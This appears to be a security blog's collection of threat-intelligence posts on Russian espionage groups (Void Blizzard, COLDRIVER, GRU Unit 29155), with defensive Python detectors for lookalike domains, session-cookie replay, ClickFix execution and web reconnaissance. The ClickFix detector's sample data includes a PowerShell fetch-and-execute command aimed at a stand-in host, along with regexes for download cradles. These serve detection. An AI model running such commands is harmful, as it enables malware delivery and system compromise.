Tag: APT

  • Russia’s Void Blizzard Targets the West’s Digital Backbone

    Microsoft Threat Intelligence has surfaced a new Russia-affiliated cyber actor: Void Blizzard, also tracked as LAUNDRY BEAR. Active since at least April 2024, this group is focused on long-term espionage targeting sectors critical to Western governments, infrastructure, and policy-making.

    Void Blizzard is not just another cluster moniker. Its tradecraft has broadened from logging in with stolen credentials bought from criminal marketplaces (infostealer logs) to running its own adversary-in-the-middle (AitM) spear-phishing campaigns. Those campaigns use typosquatted domains that mimic the Microsoft Entra sign-in portal to capture both the credentials and the session cookie issued after the victim completes MFA; replaying that cookie is what lets the actor bypass MFA and take over enterprise identities.
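    To make the lookalike-domain point concrete, here is an added example (not code from Microsoft's report or from the actor's tooling) that classifies a URL or hostname as a genuine Entra sign-in host, a lookalike of one, or unrelated. The legitimate host list, the confusable-character table and the brand tokens are assumptions for illustration; a production check would also consult the public suffix list so multi-part TLDs are handled.

```python
"""Classify a URL or hostname as a legitimate Microsoft Entra sign-in host,
a lookalike of one, or unrelated.

Added example for illustration; not from Microsoft's report. LEGIT_HOSTS,
the confusable table and BRAND_TOKENS are assumptions to extend for your own
tenant and identity providers.
"""
from urllib.parse import urlparse

# Hosts a genuine Entra / Microsoft account sign-in lands on (assumed list).
LEGIT_HOSTS = {"login.microsoftonline.com", "login.microsoft.com", "login.live.com"}
LEGIT_REGISTRABLE = {".".join(h.split(".")[-2:]) for h in LEGIT_HOSTS}
# Brand labels that phishers place under a domain they control.
BRAND_TOKENS = ("microsoftonline", "microsoft")


def _registrable(host: str) -> str:
    """Last two labels of the host. Production code should use the public
    suffix list so that 'example.co.uk' is handled correctly."""
    return ".".join(host.split(".")[-2:])


def _normalize(name: str) -> str:
    """Fold the character substitutions typosquatters rely on: rn->m, vv->w,
    1->l, 0->o. None of the legitimate names contain these sequences."""
    folded = name.replace("rn", "m").replace("vv", "w")
    return folded.translate(str.maketrans("10", "lo"))


def _levenshtein(a: str, b: str) -> int:
    """Edit distance; hostnames are short, so the O(len(a)*len(b)) table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_host(url_or_host: str) -> str:
    """Return 'legit', 'lookalike', 'unknown' or 'invalid'."""
    target = url_or_host if "://" in url_or_host else "//" + url_or_host
    host = (urlparse(target).hostname or "").lower().rstrip(".")
    if not host:
        return "invalid"
    registrable = _registrable(host)
    if registrable in LEGIT_REGISTRABLE:
        return "legit"  # a real subdomain of a Microsoft domain
    folded = _normalize(registrable)
    if folded in LEGIT_REGISTRABLE:
        return "lookalike"  # confusable swap: micros0ftonline, rnicrosoft
    for legit in LEGIT_REGISTRABLE:
        # Fuzzy-match only the long, distinctive names; a short one such as
        # live.com sits within distance 1 of too many unrelated domains.
        if len(legit) >= 12 and _levenshtein(folded, legit) <= 2:
            return "lookalike"  # typo, dropped or doubled character
    if any(token in host for token in BRAND_TOKENS):
        return "lookalike"  # brand used as a label under someone else's domain
    return "unknown"


if __name__ == "__main__":
    for candidate in ("https://login.microsoftonline.com/common/oauth2/v2.0/authorize",
                      "login.micros0ftonline.com",
                      "https://login.microsoftonline.com.evil-example.net/"):
        print(candidate, "->", classify_host(candidate))
```

    The three checks are ordered from cheapest to noisiest: an exact registrable-domain match settles the legitimate case, the confusable fold catches the substitutions that survive a casual glance at a URL bar, and the brand-token check catches the common trick of putting the real hostname in a subdomain of an unrelated registered domain.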

    Target Profile

    Void Blizzard’s campaign focus aligns closely with Russian state priorities. It has gone after targets in:

    • Defense and government agencies
    • Transportation and healthcare infrastructure
    • NGOs, education institutions, and intergovernmental organizations
    • Media and IT service providers

    While some activity overlaps with known Russian actors like APT29, Void Blizzard appears to operate as a distinct cell, coordinating within a larger ecosystem of state-sponsored espionage.

    Notable Tactics

    • Credential-based access remains a preferred entry point, but the shift to AitM phishing is a signal of increasing confidence and offensive posture.
    • Microsoft Entra impersonation suggests a deliberate focus on trusted identity systems, highlighting how fragile authentication flows can be under targeted pressure.
    • Operational consistency across NATO states and Ukraine further indicates strategic alignment with geopolitical goals, not just opportunistic targeting.

    Analyst Comments

    If you’re in defense, energy, public health, or civil society work, Void Blizzard’s tradecraft should raise alarm bells. Organizations should be:

    • Auditing Entra ID sign-in logs for session-cookie replay (the same session ID reappearing from a new IP address or ASN shortly after an MFA-satisfied sign-in) and other suspicious SSO activity
    • Deploying phishing-resistant MFA such as FIDO2 keys
    • Training users to identify lookalike URLs and domain spoofing, particularly in password reset or login prompts
    • Tracking overlaps with other Russian campaigns, especially Star Blizzard and Midnight Blizzard, to catch infrastructure reuse or strategic convergence
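    As an added example, not from Microsoft's report, the following hunts exported Entra sign-in records for the cookie-replay pattern an AitM proxy leaves behind: the same session ID reappearing from a different network shortly after an MFA-satisfied interactive sign-in. The records are constructed; `userPrincipalName`, `sessionId`, `isInteractive` and `authenticationRequirement` follow the Graph signIn schema, while `asn` is an assumed enrichment field carrying the autonomous system number.

```python
"""Hunt Entra ID sign-in records for AitM session-cookie replay.

Added example, not from Microsoft's report. SAMPLE_SIGNINS is constructed;
'asn' is an assumed enrichment field, the other field names follow the Graph
signIn schema.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_SIGNINS = [  # constructed sample data
    # Victim completes MFA at the real portal, through the AitM proxy...
    {"userPrincipalName": "a.analyst@example.org", "createdDateTime": "2025-05-20T08:01:10Z",
     "ipAddress": "203.0.113.10", "asn": 64500, "sessionId": "sess-1111",
     "authenticationRequirement": "multiFactorAuthentication", "isInteractive": True},
    # ...and two minutes later the stolen cookie is used from attacker infrastructure.
    {"userPrincipalName": "a.analyst@example.org", "createdDateTime": "2025-05-20T08:03:42Z",
     "ipAddress": "198.51.100.77", "asn": 64511, "sessionId": "sess-1111",
     "authenticationRequirement": "singleFactorAuthentication", "isInteractive": False},
    # Benign: a token refresh from the same network as the original sign-in.
    {"userPrincipalName": "b.ops@example.org", "createdDateTime": "2025-05-20T08:10:00Z",
     "ipAddress": "203.0.113.25", "asn": 64500, "sessionId": "sess-2222",
     "authenticationRequirement": "multiFactorAuthentication", "isInteractive": True},
    {"userPrincipalName": "b.ops@example.org", "createdDateTime": "2025-05-20T08:40:00Z",
     "ipAddress": "203.0.113.25", "asn": 64500, "sessionId": "sess-2222",
     "authenticationRequirement": "singleFactorAuthentication", "isInteractive": False},
    # Ambiguous: same session from another ASN ten hours later (user changed networks?).
    {"userPrincipalName": "a.analyst@example.org", "createdDateTime": "2025-05-21T07:55:00Z",
     "ipAddress": "203.0.113.10", "asn": 64500, "sessionId": "sess-4444",
     "authenticationRequirement": "multiFactorAuthentication", "isInteractive": True},
    {"userPrincipalName": "a.analyst@example.org", "createdDateTime": "2025-05-21T18:30:00Z",
     "ipAddress": "192.0.2.9", "asn": 64496, "sessionId": "sess-4444",
     "authenticationRequirement": "singleFactorAuthentication", "isInteractive": False},
]


def _ts(value: str) -> datetime:
    """Parse the ISO-8601 'Z' timestamps Entra exports."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def find_session_replay(events, window: timedelta = timedelta(hours=6)):
    """One finding per (user, session) in which a later sign-in comes from a
    different ASN than the sign-in that minted the session, within `window`."""
    by_session = defaultdict(list)
    for ev in events:
        by_session[(ev["userPrincipalName"], ev["sessionId"])].append(ev)

    findings = []
    for (user, session_id), evs in by_session.items():
        evs.sort(key=lambda ev: _ts(ev["createdDateTime"]))
        anchor = evs[0]  # the sign-in that established the session cookie
        for later in evs[1:]:
            delta = _ts(later["createdDateTime"]) - _ts(anchor["createdDateTime"])
            if later["asn"] == anchor["asn"] or delta > window:
                continue
            # Strongest signal: MFA was satisfied once, interactively, and the
            # reuse is a non-interactive single-factor sign-in, i.e. the cookie
            # itself is carrying the MFA claim.
            replayed = (anchor["authenticationRequirement"] == "multiFactorAuthentication"
                        and later["authenticationRequirement"] != "multiFactorAuthentication"
                        and not later["isInteractive"])
            findings.append({
                "user": user, "sessionId": session_id,
                "originIp": anchor["ipAddress"], "replayIp": later["ipAddress"],
                "minutesBetween": int(delta.total_seconds() // 60),
                "severity": "high" if replayed else "medium",
            })
    return findings


if __name__ == "__main__":
    for finding in find_session_replay(SAMPLE_SIGNINS):
        print(finding)
```

    The window is the tuning knob: six hours catches the minutes-later replay that follows a live phish while leaving the next-day network change for a lower-priority review, and widening it (see the test below) pulls that case in as well. An ASN change is used rather than a raw IP change because mobile and corporate egress pools rotate addresses within one network all day.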

    Final Thoughts

    Void Blizzard is not flashy, but it is serious. It demonstrates how Russia continues to evolve its cyber espionage toolkit beneath the noise of more destructive attacks. In an era of hybrid conflict, groups like Void Blizzard are the quiet operatives laying groundwork for geopolitical advantage. They definitely won’t be the last.

    See Microsoft’s full report: https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/

  • Asymmetric Cyber Threats: Lessons from Guerrilla Warfare

    The Digital Guerrilla

    When you think of cyber warfare, you often imagine digital equivalents of tanks, missiles, and grand battles between major powers. In reality, however, the cyber conflict we see today looks less like Normandy and more like a slow-burning insurgency.

    State-sponsored actors, whether they be from Russia, China, Iran, or North Korea, rarely go toe-to-toe with superior Western cyber defenses in a direct, conventional fight. Instead, they operate in the shadows, using asymmetric tactics meant for low-cost, high-yield disruption. Their methods resemble the playbook of guerrilla fighters throughout history: blend in, strike vulnerable targets, and exploit the defender’s size and rigidity.

    In today’s post, I’ll unpack how these cyber operations mirror classic guerrilla warfare and why this analogy is so interesting and matters for defenders.

    Guerrilla Warfare 101

    It’s all about fighting smarter, not harder: the art of the weak harassing the strong. The term itself comes from the Spanish irregulars who fought Napoleon, and from the trench stalemates of WWI onward insurgent groups have leveraged mobility, surprise, and intimate knowledge of the terrain to outmaneuver larger, better-equipped militaries.

    Characteristics of guerrilla warfare include:

    • Asymmetry: Small groups using unconventional methods to challenge superior foes.
    • Deniability: Fighters blend into civilian populations, making attribution and retaliation tougher.
    • Hit-and-run tactics: Ambushes, sabotage, quick raids, always moving.
    • Psychological ops: Targeting public morale, misinformation.
    • Terrain advantage: Mastery of local geography to evade and frustrate conventional forces.

    Sounds familiar, right? Swap out “fighters” for “APT groups”, “civilian populations” for “cybercriminal groups”, and “terrain” for “network infrastructure”, and you’ve got a pretty solid picture of today’s cyber landscape.

    Guerrilla Tactics in Action: State-Sponsored Cyber Threats

    Asymmetry in the Digital Domain

    State-sponsored groups like Russia’s APT28 and APT29 or North Korea’s Lazarus Group rarely match US or allied cyber capabilities head-on. They exploit the cost asymmetry. For a few thousand dollars in phishing kits, compromised VPN credentials, leased botnets, or commodity malware, they can inflict millions in damages, steal sensitive data, or shape public narratives. The defender’s dilemma: defending every endpoint and supply-chain vector costs far more than launching simple, repeatable attacks.

    Deniability and Proxy Warfare

    Just as guerrillas hide among civilians, cyber operators mask their identities by using compromised infrastructure and false flags, or by contracting work out to criminal elements and impressionable recruits. Russia’s GRU Unit 29155, for instance, has used Telegram channels to incite Ukrainian youth to acts of sabotage, and North Korea’s placement of fraudulent third-party IT freelancers inside Western companies is another prime example. The plausible deniability muddies attribution, delays response, and lets our adversaries operate with relative impunity.

    Hit-and-Run in Cyberspace

    Watering hole attacks, defacements, and smash-and-grab data theft mirror the guerrilla’s ambush. Breach a vulnerable vendor, pivot to the target, exfiltrate quickly, and vanish while defenders are left scrambling. These aren’t prolonged sieges, they’re opportunistic raids meant to probe weaknesses and sow chaos.

    Information Warfare as PsyOps

    Iranian and Russian cyber units have elevated disinformation to an art form. Influence operations targeting elections, societal divisions, or corporate reputations function as digital equivalents of guerrilla psychological operations. The goal isn’t always tangible damage; sometimes it’s just to erode trust and create confusion or panic.

    Mastering the Digital Terrain

    In guerrilla conflicts, knowing the terrain is everything. In cyberspace, that “terrain” includes compromised networks, 3rd party vendors, poorly monitored endpoints, and the dark web. State-sponsored groups map this terrain meticulously, identifying soft targets and exploiting global infrastructure for cover.

    Some Case Studies: Cyber Guerrilla Warfare in Practice

    In 2025 there are plenty of examples to pull from, but some of the more recent, notable cases include:

    Russia’s (FSB) COLDRIVER/Callisto/Star Blizzard

    Operating between cyberespionage and influence, this group exemplifies cyber guerrilla tactics. Recent reporting on its persistent targeting of Western NGOs, think tanks, and academia reflects a strategy of sustained harassment: undermining soft targets, shaping narratives, and stealing sensitive (not always classified) information that feeds broader geopolitical campaigns.

    North Korea’s IT Worker Fraud

    The DPRK has combined traditional APT activities with an insurgent-style infiltration campaign: fraudulent IT workers securing remote jobs at Western firms. Once inside, these operatives act as insider threats with direct access to networks, sidestepping conventional perimeter defenses. The tactic parallels how insurgents embed within civilian populations to evade detection and execute attacks from within; here the payoff is funding the regime’s weapons programs, among other objectives.

    Iran’s APT33/35/42

    Iranian threat groups excel at opportunistic targeting, often focusing on vulnerable sectors like oil & gas, transportation, and academia. Their attacks prioritize disruption, espionage, and influence, mirroring guerrilla strategies of infrastructure sabotage and psychological impact over decisive victories.

    Volt Typhoon: An Occupational Model

    China’s Volt Typhoon operations showcase a more sophisticated “occupation” model. Rather than smash-and-grab, their campaigns are long-term entrenchments in U.S. critical infrastructure, designed for persistent access and latent sabotage potential. This is less hit-and-run, more like guerrilla fighters establishing fortified zones in contested territory.

    Why the Guerrilla Warfare Analogy Matters

    Understanding cyber threats through the lens of guerrilla warfare reframes how we think about defense and deterrence.

    • Misaligned Defenses: Conventional cyber defenses are analogous to defending cities with large armies while insurgents roam freely in the countryside. Static defenses are insufficient against agile, persistent adversaries.
    • Deterrence is Harder: You can deter a nation’s military with superior firepower. Deterring a deniable, decentralized cyber guerrilla force is a different challenge.
    • Hybrid Warfare Context: These cyber guerrilla tactics don’t exist in a vacuum. They’re part of broader hybrid strategies, supporting kinetic operations, diplomatic pressure, or internal destabilization efforts.

    Mitigation?

    This is a tough one, as mitigating guerrilla tactics requires more than building bigger walls or buying more security tools. Some things worth considering:

    • Persistent threat hunting
    • Implement honeypots
    • Coordination/collaboration across government, private sector, and civil society
    • Publicly naming and sanctioning enablers

    Tactics Snapshot

    • Phishing (social engineering)
    • Credential harvesting (raids on the enemy’s supplies)
    • Watering hole attacks (ambush on a known route)
    • Supply chain subversion (indirect targeting)
    • Wiper malware (destructive sabotage)

    Conclusion

    Guerrilla warfare didn’t disappear with the end of colonial insurgencies or Cold War proxy wars. It evolved and found a new battleground on the web. Today’s state-sponsored cyber operations mirror the asymmetric tactics of historical insurgencies in that they’re cheap, deniable, persistent, and designed to frustrate superior foes. For defenders like us, recognizing this parallel is less academic and more essential for adapting strategy, resource allocation, and useful threat modeling.

    The digital guerrilla is no longer just a rebel in the jungle. They’re a sanctioned asset, behind a keyboard, operating in the blurred space between espionage, sabotage, and information warfare.

  • COLDRIVER’s New LOSTKEYS Malware Targets Western Officials

    Summary

    Between Jan and Apr 2025, suspected Russian FSB-linked threat group COLDRIVER delivered LOSTKEYS malware using a fake CAPTCHA to target Western officials, journalists, think tanks, and NGOs.

    Russian Threat Group COLDRIVER Deploys LOSTKEYS Malware Targeting Western Entities

    The Russian state-sponsored threat group COLDRIVER (aka UNC4057, Callisto, and Star Blizzard) has expanded its cyberespionage toolkit with the addition of a new malware strain dubbed LOSTKEYS. According to Google’s Threat Intelligence Group (GTIG), this marks a significant evolution from COLDRIVER’s usual credential phishing toward custom malware development.

    Evolution of Tactics

    Historically, COLDRIVER focused on credential phishing campaigns targeting high-profile individuals in NATO governments, NGOs, and former intelligence and diplomatic officials. The group’s primary objective has been intelligence collection in support of Russian strategic interests. Activity observed in early 2025 indicates a shift toward deploying custom malware to extend its data-collection and exfiltration capabilities.

    Introduction of LOSTKEYS

    LOSTKEYS is designed to steal files from predefined directories and file types and to send system information and a list of running processes back to the operators. It is delivered through a multi-stage infection chain that begins with a lure website featuring a fake CAPTCHA. Once the target interacts with the CAPTCHA, they are instructed to copy a PowerShell command and run it themselves, which starts the infection. This technique, known as “ClickFix”, socially engineers the target into copying, pasting, and executing malicious PowerShell commands, so no malicious attachment or exploit ever has to get past mail filtering. It has gained notoriety as a range of other threat actors have adopted it.
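    The ClickFix chain leaves a distinctive trace on the endpoint: PowerShell spawned from the Run dialog (explorer.exe as parent) with a pasted command line. The following added example (not GTIG's code and not the actor's) scores process-creation events for that pattern, decoding -EncodedCommand payloads so that indicators hidden inside them count too. The events are constructed in the shape of Sysmon Event ID 1 fields; the indicator regexes and the "not a robot" lure phrase are assumptions drawn from common ClickFix lures, not details from the LOSTKEYS report.

```python
"""Score process-creation events for ClickFix-style execution: PowerShell
launched from the Run dialog with a pasted download cradle.

Added example, not from GTIG's report. SAMPLE_EVENTS are constructed in the
shape of Sysmon Event ID 1 fields; the indicator regexes and lure phrases are
assumptions based on common ClickFix lures.
"""
import base64
import re
from pathlib import PureWindowsPath

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "iex": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\b(?:irm|iwr)\b|net\.webclient", re.I),
    "exec_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass|-nop(?:rofile)?\b", re.I),
    "encoded_command": ENCODED_RE,
    "lure_phrase": re.compile(r"not a robot|captcha|verification id|verify you are human", re.I),
}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe"}  # Win+R launches the child under explorer.exe

SAMPLE_EVENTS = [  # constructed sample data
    {"User": "CORP\\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://captcha-check.example/verify)"'
                    ' # I am not a robot - Verification ID: 7731'},
    {"User": "CORP\\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # SQBFAFgA is the base64 of 'IEX' encoded as UTF-16LE
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgA"},
    {"User": "CORP\\svc-inv", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"User": "CORP\\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -EncodedCommand SQBFAFgA"},
]


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _decoded_command(cmdline: str) -> str:
    """Decode an -EncodedCommand payload (base64 of UTF-16LE) so indicators
    inside it count; return '' when absent or malformed."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    token = m.group(1)
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4))
        return raw.decode("utf-16-le", errors="ignore")
    except ValueError:
        return ""


def score_event(event: dict, min_score: int = 2) -> dict:
    """Return the matched indicator names, a score, and whether the event fits
    the ClickFix pattern: Run-dialog parent, PowerShell child, score >= min_score."""
    cmdline = event.get("CommandLine", "")
    text = cmdline + "\n" + _decoded_command(cmdline)
    matched = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    from_run_dialog = (_basename(event.get("ParentImage", "")) in RUN_DIALOG_PARENTS
                       and _basename(event.get("Image", "")) in POWERSHELL)
    return {"user": event.get("User", "?"), "matched": matched,
            "score": len(matched), "clickfix": from_run_dialog and len(matched) >= min_score}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(score_event(ev))
```

    The parent-process requirement is what keeps this rule quiet: administrators run encoded and profile-less PowerShell from consoles, scripts and services all day (the last sample event), but a user pasting a download cradle into Win+R produces a PowerShell child of explorer.exe, which legitimate automation almost never does. Pair it with a second rule for terminal parents if your users have been trained to paste into a terminal instead.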

    Targets and Objectives

    COLDRIVER’s recent campaigns have targeted current and former advisors to Western governments, militaries, journalists, think tanks, NGOs, and individuals connected to Ukraine. The group’s operations aim to gather intelligence that aligns with Russian strategic interests. In some cases, COLDRIVER has been linked to hack-and-leak campaigns targeting officials in the UK and NGOs.

    Analyst Comments:

    The evolution of COLDRIVER from basic credential phishing to deploying custom malware like LOSTKEYS emphasizes a broader trend in Russian cyberespionage: the increasing willingness to burn bespoke tools in pursuit of higher value intelligence collection. The shift seems to suggest mounting pressure on Russian intelligence services to deliver actionable insights amid ongoing geopolitical tensions, particularly related to NATO support for Ukraine and Western policy responses.

    Through their targeting of advisors, think tanks, and NGOs, COLDRIVER is focusing on influencers and policy shapers, not just government officials. This indicates a strategic effort of preempting or shaping foreign policy decisions. Their adoption of techniques like ClickFix also signals an emphasis on user-driven execution, a smart bypass of traditional email defenses and endpoint controls. As we’ve seen in the past, employees are the weakest link in an organization’s security posture.

    For us network defenders, this campaign highlights the importance of defense-in-depth, user education (a must), and proactive threat hunting. The fact that COLDRIVER now deploys malware directly onto victim systems raises the stakes for organizations that had focused only on preventing account compromise.

    In short, COLDRIVER’s operational pivot is just another reminder that cyberespionage groups adapt faster than most defensive postures. Organizations in policy-adjacent sectors should assume they are in the targeting scope, even if they don’t handle classified information, and adjust security postures accordingly.

    Reference(s) and Further Reading:

    https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos

    https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-341a

    https://home.treasury.gov/news/press-releases/jy1962

  • The Escalation of GRU Unit 29155: Espionage and Sabotage Tactics

    Disclaimer: This post is based on unclassified, open-source reporting and reflects my personal analysis and interpretations. The views expressed here are my own and do not represent the views or positions of my employer.

    Background

    Russian GRU Unit 29155 (aka Cadet Blizzard, Ember Bear, FrozenVista, UNC2589) is a covert subunit of the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU), primarily tasked with conducting high-stakes clandestine operations abroad. It gained public attention for activities that align with Russia’s asymmetric warfare objectives, particularly in Europe, Ukraine, and NATO-affiliated regions, and it operates across several domains, from traditional espionage and sabotage to cyber operations.

    Unit 29155 has significantly intensified operations since 2020, pivoting from covert actions in Europe toward a greater emphasis on cyber operations with a focus on undermining Ukraine and NATO allies through espionage, data manipulation, and sabotage.

    Primary TTPs

    • Espionage and Data Theft
      • Unit 29155 conducts extensive espionage campaigns aimed at gathering intelligence from NATO countries, European Union members, and multiple nations in Latin America and Central Asia. The unit has targeted critical infrastructure and government systems, using reconnaissance tools like Nmap and Shodan to find exposed services and vulnerabilities [2].
      • Sensitive information obtained through these operations is occasionally leaked or shared publicly to damage the reputations of victims as part of influence efforts [3].
    • Destructive Operations
      • Unit 29155 has been tied to the deployment of the destructive WhisperGate malware against Ukrainian government and critical infrastructure entities in January 2022, weeks before the full-scale invasion. Disguised as ransomware, WhisperGate was built to erase victim data rather than hold it for ransom, marking a clear shift to sabotage aligned with Russian military objectives.
      • Destructive attacks have also been directed towards logistics operations supporting Ukraine, as seen in repeated attacks against infrastructure crucial to NATO and EU support for Ukraine [2].
    • Infrastructure Scanning/Domain Enumeration
      • Unit 29155 has been tied to over 14,000 documented instances of domain scanning against NATO and EU entities. The scanning is preparatory, identifying weak points for later exploitation. Publicly available and custom tools, including Acunetix, WPScan, and VirusTotal, were commonly used for this reconnaissance [3].
    • Cybercriminal Overlap
      • Not unique to Unit 29155 but common across Russian state-sponsored APT groups, researchers report collaboration with known cybercriminal elements, employing non-GRU actors to facilitate operations. This working relationship extends the group’s reach, lets it draw on technical expertise outside formal military ranks, and obscures attribution. The unit is also believed to consist primarily of junior personnel and so may operate at a less sophisticated level than groups like APT28 or APT29 [4].

    Mitigations and Recommendations

    Cyber defenders across critical sectors are encouraged to implement mitigations against known tactics:

    • Prioritize patching of known vulnerabilities and enforce multi-factor authentication (MFA).
    • Monitor networks for unusual scanning or reconnaissance activity and segment networks to mitigate lateral movement, post infiltration.
    • Use intrusion detection tools to monitor for technical indicators of compromise (IOCs) relating to Unit 29155.
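    For the second of these mitigations, here is an added example (not from the advisories cited) that profiles web-server access logs for the kind of reconnaissance described above: scanner user agents, bursts of 4xx responses, and probes of well-known CMS and secrets paths. The log lines are constructed in Apache/nginx combined format; the scanner user-agent substrings and the probe path list are a short assumed starting point to extend with your own telemetry. Network-level port scans need flow or IDS data rather than web logs.

```python
"""Profile web access logs for reconnaissance: scanner user agents, 4xx
bursts and probes of CMS / secrets paths.

Added example, not from the advisories cited. SAMPLE_LOG is constructed in
combined log format; SCANNER_UA and PROBE_RE are assumed starting lists.
"""
import re
from collections import defaultdict

SAMPLE_LOG = """\
198.51.100.23 - - [09/Sep/2024:10:02:11 +0000] "GET /wp-login.php HTTP/1.1" 404 153 "-" "WPScan v3.8.25 (https://wpscan.com/wordpress-security-scanner)"
198.51.100.23 - - [09/Sep/2024:10:02:12 +0000] "GET /xmlrpc.php HTTP/1.1" 404 153 "-" "WPScan v3.8.25 (https://wpscan.com/wordpress-security-scanner)"
198.51.100.23 - - [09/Sep/2024:10:02:12 +0000] "GET /wp-content/plugins/revslider/readme.txt HTTP/1.1" 404 153 "-" "WPScan v3.8.25 (https://wpscan.com/wordpress-security-scanner)"
198.51.100.23 - - [09/Sep/2024:10:02:13 +0000] "GET /.env HTTP/1.1" 404 153 "-" "Mozilla/5.0"
198.51.100.23 - - [09/Sep/2024:10:02:14 +0000] "GET /admin/ HTTP/1.1" 403 199 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Sep/2024:10:05:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/129.0"
203.0.113.5 - - [09/Sep/2024:10:05:02 +0000] "GET /static/app.css HTTP/1.1" 200 2048 "https://www.example.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/129.0"
203.0.113.5 - - [09/Sep/2024:10:05:09 +0000] "GET /about HTTP/1.1" 200 3300 "https://www.example.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/129.0"
192.0.2.77 - - [09/Sep/2024:10:07:30 +0000] "GET /.git/config HTTP/1.1" 404 153 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.0.2.200 - - [09/Sep/2024:10:09:00 +0000] "GET /old-page HTTP/1.1" 404 153 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/128.0"
192.0.2.200 - - [09/Sep/2024:10:09:05 +0000] "GET /missing HTTP/1.1" 404 153 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/128.0"
192.0.2.200 - - [09/Sep/2024:10:09:09 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/128.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
# Assumed user-agent substrings of common recon tools.
SCANNER_UA = ("wpscan", "acunetix", "nmap scripting engine", "droopescan")
# Assumed short list of paths that only a scanner or an attacker asks for.
PROBE_RE = re.compile(
    r"^/(?:wp-login\.php|xmlrpc\.php|wp-admin|wp-content/plugins|\.env|\.git|user/login|phpmyadmin)",
    re.I)


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def profile_sources(lines, min_requests: int = 3, flag_at: int = 3) -> dict:
    """Aggregate per source IP and score: scanner UA (+3), error ratio >= 0.5
    over at least min_requests (+2), probe paths (+1 each, capped at +2)."""
    per_ip = defaultdict(lambda: {"requests": 0, "errors": 0, "scanner_ua": False, "probes": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        st = per_ip[rec["ip"]]
        st["requests"] += 1
        st["errors"] += int(rec["status"] >= 400)
        st["scanner_ua"] |= any(sig in rec["ua"].lower() for sig in SCANNER_UA)
        if PROBE_RE.match(rec["path"]):
            st["probes"].add(rec["path"])
    for st in per_ip.values():
        st["error_ratio"] = round(st["errors"] / st["requests"], 2)
        score = 3 if st["scanner_ua"] else 0
        if st["requests"] >= min_requests and st["error_ratio"] >= 0.5:
            score += 2
        score += min(len(st["probes"]), 2)
        st["score"] = score
        st["suspicious"] = score >= flag_at
        st["probes"] = sorted(st["probes"])
    return dict(per_ip)


if __name__ == "__main__":
    for ip, st in profile_sources(SAMPLE_LOG.splitlines()).items():
        if st["suspicious"]:
            print(ip, st)
```

    The error-ratio term alone is deliberately not enough to flag a source (the 192.0.2.200 visitor hitting two stale bookmarks scores 2), because broken links produce the same 404 pattern; it only tips the balance when combined with a scanner signature or probes of paths that have no reason to be requested on that host. Feed the suspicious sources into the network-level monitoring in the previous bullet, since the same operator will usually have port-scanned the host first.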

    Unit 29155’s evolution highlights a blend of traditional espionage with enhanced cyber and sabotage capabilities, particularly against high-stakes geopolitical targets. The expanded use of cyber tactics shows why affected nations and organizations must maintain vigilance and robust cyber defenses.

    References

